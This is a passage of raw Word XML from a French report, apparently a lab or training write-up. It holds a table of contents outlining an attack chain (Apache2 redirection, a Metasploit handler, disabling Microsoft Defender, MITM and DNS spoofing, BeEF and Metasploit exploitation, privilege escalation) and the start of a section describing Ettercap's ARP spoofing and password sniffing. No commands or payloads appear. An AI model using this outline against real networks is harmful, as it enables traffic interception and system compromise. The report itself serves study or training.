      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586236 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA338E1" w14:textId="29400E37" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Paramétrage de la redirection Apache2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586237 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9C2D7" w14:textId="18F95206" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586238 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544874D" w14:textId="335E6527" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586239 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51075C9A" w14:textId="58C52531" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Lancement du handler sur Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586240 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="227872AA" w14:textId="50A3E75A" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Désactivation de Microsoft Defender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586241 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D39AC2" w14:textId="0DF15BEC" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="440"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD50CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD50CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Lancement de l’attaque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586242 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4C464" w14:textId="376413A4" w:rsidR="00AD50CA" w:rsidRPr="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD50CA">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Man In The Middle and DNS Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD50CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AD50CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586243 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00AD50CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4F07D9" w14:textId="5B7CCE23" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Exploitation Beef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586244 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECE04E" w14:textId="2E7596AA" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Exploitation Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586245 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065ED53" w14:textId="09325570" w:rsidR="00AD50CA" w:rsidRDefault="00AD50CA">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="880"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9060"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3D54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Elévation de privilège</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc133586246 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B616A4D" w14:textId="014E4C98" w:rsidR="00FB22D2" w:rsidRDefault="00AD5A0F" w:rsidP="00FB22D2">
      <w:pPr>
        <w:pStyle w:val="EF-chapitretitre"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB8A55" w14:textId="77777777" w:rsidR="00FB22D2" w:rsidRDefault="00FB22D2">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Gras" w:hAnsi="Arial Gras" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:caps/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0FE48" w14:textId="0C736206" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00087C41">
      <w:pPr>
        <w:pStyle w:val="EF-chapitretitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc133586220"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Présentation des </w:t>
      </w:r>
      <w:r w:rsidR="00E43848">
        <w:t>éléments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5A53305A" w14:textId="7809F064" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc133586221"/>
      <w:r>
        <w:t>Outils</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0DD2B113" w14:textId="019FDD71" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33589EC9" w14:textId="5BA15147" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74194127" wp14:editId="2F71EBE2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>36830</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3421380" cy="1927968"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="95" name="Picture 95" descr="Ettercap and middle-attacks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ttercap and middle-attacks tutori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1380" cy="1927968"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> est un outil de surveillance en réseau open-source qui est principalement utilisé pour l'analyse de paquets en temps réel et la capture de données en transit sur un réseau local. Il peut être utilisé pour diverses activités malveillantes telles que la surveillance du trafic réseau, l'attaque de l'homme du milieu (MITM), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>l'arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> spoofing, le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>sniffing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> de mot de passe, le déni de service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>) et la redirection de session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760B3B2C" w14:textId="33773E1C" w:rsidR="009D01D6" w:rsidRPr="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Le fonctionnement d'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> repose sur la technique ARP spoofing. ARP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>Resolution</w:t>
      </w:r>
